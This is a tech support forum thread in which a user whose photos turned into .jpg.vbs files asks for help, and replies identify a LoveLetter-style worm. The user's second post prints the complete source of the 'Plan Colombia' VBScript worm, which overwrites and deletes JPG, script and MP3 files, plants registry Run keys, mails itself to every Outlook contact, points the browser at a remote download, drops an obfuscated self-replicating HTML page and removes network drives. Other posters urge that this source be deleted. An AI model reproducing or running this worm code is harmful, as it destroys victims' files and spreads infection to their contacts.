Tech Support banner

Status
Not open for further replies.
1 - 19 of 19 Posts

·
Registered
Joined
·
6 Posts
Discussion Starter #1
Something in my system has converted my jpg's to VB Script files!

All my family photos are suddenly not available. Their names remain as so and so photo.jpg, but the type of file is now VB Script. Also, the date on each jpg is update each time I boot the computer.

When I double click each file, the hourglass begins to spin as if it is trying to open, then nothing.

I use a Canon photo handler called Zoom Browser.

Help!
 

·
ID10T Circuit replacement
Joined
·
1,038 Posts
Do you have a current antivirus scanner? It sounds either like a virus, or your file association is misconfigured. Open up My computer, Click Tools--> Folder options, then View. In there remove the check mark for Hide extensions for known file types. Click 'OK'.

Open up the folder with the pictures and see if they are photo.jpg.vbs or something similiar. If it is, right click on the file and click 'Edit' . This should bring up Notepad. If you post some of the text from this file, I can help determine if it is a virus, and if the virus may have saved your pictures somewhere else.

If the file is still photo.jpg, then we need to correct the file assoc.

Let me know.
 

·
Registered
Joined
·
6 Posts
Discussion Starter #3
Thanks!

Yep! There it is! The names of the file are xxx.jpg.vbs. Now what?



rem ===============================================================================================
rem "Plan Colombia" virus v1.0
rem by Sand Ja9e Gr0w (www.colombia.com)

rem Dedicated to all the people that want to be hackers or crackers, in Colombia
rem This program is also a protest act against the violence and corruption that Colombia lives...
rem I always wanting that all this finishes, I have said...


rem Santa fe de Bogotá 2000/09
rem I dedicate to all you the song "GoodBye" of Andreas Bochelli
rem =================================================================================================


rem Thanks God..!
rem A greeting for "Lina María" from "Santa fe de Bogotá"
rem A greeting for "Tizo" from "Spain"
rem And One kicked of tail to my friends, "eL ChE" and "ThE SpY"

rem okay, ok...
rem my baby start here...


On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow,polyn,numero,polye
eq=""
ctr=0

randomize
numero = Int(Rnd * 3) + 1
polye = ".GIF.vbs"
If numero = 1 Then
polye = ".BMP.vbs"
Else
If numero = 2 Then
polye = ".JPG.vbs"
End If
End If


polyn="\"&polyname(Int(Rnd * 5) + 4)&polye

Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso_OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
If Day(Now) = 17 And Month(Now) = 9 Then
MsgBox "Dedicated to my best brother=>Christiam Julian(C.J.G.S.)" & Chr(13) & "Att. " & polyname(5) & " (M.H.M. TEAM)"
killnet()
End If



sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\LINUX32.vbs")
c.Copy(dirwin&"\reload.vbs")
c.Copy(dirsystem&polyn)
regruns()
html()
spreadtoemail()
listadriv()
end sub



sub regruns()
On Error Resume Next
Dim num,downread,res
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\LINUX32",dirsystem&"\LINUX32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\reload",dirwin&"\reload.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if

rem acepta nombres largos..?
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
Randomize
num = Int((4 * Rnd) + 1)

rem fatal => send virii
if num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://members.fortunecity.com/plancolombia/macromedia32.zip"
else
rem oh,, a picture.. nice :)
if num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://members.fortunecity.com/plancolombia/linux321.zip"
else
rem oh,, other picture =:()
if num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://members.fortunecity.com/plancolombia/linux322.zip"
end if
end if
end if
end if

if (fileexist(downread&"\MACROMEDIA32.zip")=0) then
res = Shell("copy " & downread & "\MACROMEDIA32.zip " & dirwin & "\important_note.txt", vbHide)
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\plan colombia",dirwin&"\important_note.txt"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
else
if (fileexist(downread&"\linux321.zip")=0) then
Kill (dirwin & "\logos.sys")
res = Shell("copy " & downread & "\linux321.zip " & dirwin & "\logos.sys", vbHide)
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
else
if (fileexist(downread&"\linux322.zip")=0) then
Kill (dirwin & "\logow.sys")
res = Shell("copy " & downread & "\linux322.zip " & dirwin & "\logow.sys", vbHide)
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end if
end if
end sub



sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives

For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next

listadriv = s
end sub



sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files

for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso_OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
else
if(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso_OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
else
if(ext="jpg") or (ext="jpeg") then
set ap=fso_OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
else
if(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
end if
end if
end if
next

end sub



sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders

for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next

end sub


sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub


function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function


function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function


function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function



sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,correoad,b,regedit,regv,regad,textosub,textobod

set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")

Randomize
numero = Int(Rnd * 3) + 1
textosub = ""
If numero = 1 Then
textosub = "US PRESIDENT AND FBI SECRETS =PLEASE VISIT => (http://WWW.2600.COM)<="
Else
If numero = 2 Then
textosub = polyname(6)
End If
End If


Randomize
numero = Int(Rnd * 3) + 1
textobod = ""
If numero = 1 Then
textobod = "VERY JOKE..! SEE PRESIDENT AND FBI TOP SECRET PICTURES.."
Else
If numero = 2 Then
textobod = polyname(10)
End If
End If


for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then

for ctrentries=1 to a.AddressEntries.Count
correoad=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&correoad)
if (regad="") then
set correo=out.CreateItem(0)
correo.Recipients.Add(correoad)
correo.Subject = textosub
correo.Body = vbcrlf&textobod
correo.Attachments.Add(dirsystem&polyn)
correo.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&correoad,1,"REG_DWORD"
end if
x=x+1
next

regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next

Set out=Nothing
Set mapi=Nothing
end sub


Function polyname(n)
Dim i, vector, texto, pos
on error resume next
rem polyformic ( ohhhh yeahhh...) very good polyformic engine :() by Sand Ja9e Gr0w

vector = Array("A", "E", "I", "O", "U")
texto = ""
Randomize
For i = 1 To n
Randomize
rem consonante
texto = texto&Chr(Int((Rnd * 25) + 65))
i = i + 1
If i > n Then
exit for
end if
rem vocal
texto = texto&vector(Int((Rnd * 4) + 1))
Randomize
Next

polyname = texto
End Function




sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD>"&_
"<?-?HEAD><BODY [email protected]@window.name=#-#main#-#;window.open(#-#US-PRESIDENT-AND-FBI-SECRETS.HTM# -#,#-#main#-#)@[email protected] "&vbcrlf& _
"[email protected]@window.name=#-#main#-#;window.open(#-#US-PRESIDENT-AND-FBI-SECRETS.HTM# -#,#-#main#-#)@[email protected] [email protected]@[email protected]@ [email protected]@#[email protected]@>"&vbcrlf& _
"<CENTER><p>M.H.M TEAM <?-?p><p>Colombia<BR>- Please press #-#YES#-# button for see secret pictures<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE [email protected]@[email protected]@ [email protected]@[email protected]@>Hello Colombia...! Since Here, after, since other part of World..<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT [email protected]@[email protected]@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT [email protected]@[email protected]@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="

dta2="set fso=CreateObject(@[email protected]@[email protected])"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@[email protected]^-^[email protected]@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@[email protected]^-^[email protected]@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @[email protected]: can#-#t load Pictures. IE internal [email protected]@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@[email protected]@[email protected])"&vbcrlf& _
"regedit.RegWrite @[email protected]_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^[email protected]@,dirsystem&@[email protected]^-^[email protected]@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"

dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso_OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)

for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next

set b=fso.CreateTextFile(dirsystem+"\US-PRESIDENT-AND-FBI-SECRETS.HTM")
b.close
set d=fso_OpenTextFile(dirsystem+"\US-PRESIDENT-AND-FBI-SECRETS.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub



sub killnet()
Dim intDrive,strDrive,WSHNetwork

on error resume next


Set WSHNetwork = WScript.CreateObject("WScript.Network")

For intDrive = 26 To 5 Step -1
strDrive = Chr(intDrive + 64) & ":"
WSHNetwork.RemoveNetworkDrive strDrive
Next

rem bye net connection ... :-(
Set WSHNetwork=Nothing

end sub
 

·
Registered
Joined
·
266 Posts
woodburyrd,

I've very bad news for you.
I hope you have all your pictures backed up. They're all gone.

Get a good Antivirus and try to save what's left.
Check your MP3's, probably they have been renamed too.

Let us know if you need any more help removing the virus.
 

·
Registered
Joined
·
266 Posts
see this line?

rem okay, ok...
rem my baby start here...
this is the creator of this stupid script, bragging about his "creation". what a lammer.
 

·
Registered
Joined
·
266 Posts
woodburyrd,

YOU NEED TO EDIT YOUR SECOND POST TO REMOVE THE CONTENT OF THE FILE. THERE'S A VIRUS WITHIN THE POST.

REMOVE IT A.S.A.P
 

·
Registered
Joined
·
139 Posts
It bears repeating: no one, but NO ONE should EVER be without an updated antivirus AND firewall!

When will people EVER learn? It's all over the news, every day!
 

·
ID10T Circuit replacement
Joined
·
1,038 Posts
Sorry it took so long, but Breakerfall and music freak jumped right in.

Please do edit your post. Or maybe a moderator will do this. We do not need another variant.

FYI
This is listed under a variant of the loveletter virus. The coding is a little bit different, but accomplishes the same. Your files were not renamed or backed up, they were deleted and then the copy of the virus was put in their place with the double extension.
 

·
TSF Enthusiast
Joined
·
6,298 Posts
Tough luck.

Exact same thing happened to me- I had norton with updated definitions, too, but it didn't matter because it wasn't configured to scan .vbs files.

It's ok to cry
 

·
TSF Enthusiast
Joined
·
6,298 Posts
VERY JOKE..! SEE PRESIDENT AND FBI TOP SECRET PICTURES..
very joke? man, what a tool.
 

·
Registered
Joined
·
266 Posts
woodburyrd,

PLEASE, remove your second post,
unintentionally, you posted the virus on the thread.

thanks
 

·
TSF Enthusiast
Joined
·
6,298 Posts
hit the edit button near it, check the delete box and then hit the delete button.
 

·
TSF Enthusiast
Joined
·
6,298 Posts
I don't think it's that big a deal...some people freak out when they see virus source code, but I doubt it's that rare that it can't be found anywhere else...I mean, it is variant of the most propagated virus ever, right?
 

·
Registered
Joined
·
2 Posts
BUMP...Found this dreaded virus again!
I am new here, and just bought a Compaq 2266 with Windows 98 (1st edition) and the virus has renamed virtually all Jpgs, except some later added bitmaps that I opened with IE and then re-saved as Jpegs. I ran the Norton...yep, you guessed it!
Symantic Norton Anti-Virus installed, the only AV I ever spent good money on only to switch to free ware. The S T I N G E R app is supposed to aid computers affected by viruses, as well as the possibility Compaq has a sector of restoration ware on these Presarios. Most apps are running and the virus scan was run as well, presumably fixing files that it was able to. Can Grisoft's AVS <sp?> work on Windows 98 with out the SE additions?
A few software items won't install because it dates to 1998.
I want to save as many pic files as I can and I found these viruses maybe dated different but act the same. I noted the IE link went to Colombia web site and I checked it on a good computer and nothing happened, but I fear it's a trojan in lurking. Help requested ASAP:wave:
 

·
Registered
Joined
·
2 Posts
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
HKCU\Software\Microsoft\Windows Scripting Host\Settings\Timeout
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
HKCU\Software\Microsoft\WAB\*

I found these references to changes in the Registry, can someone tell me the variations for XP, vs Win98 so I can find the spots to alter correctly?
I came upon this using SEARCH and not picking the forum of XP over Win 9x, so sorry about that.
 
1 - 19 of 19 Posts
Status
Not open for further replies.
Top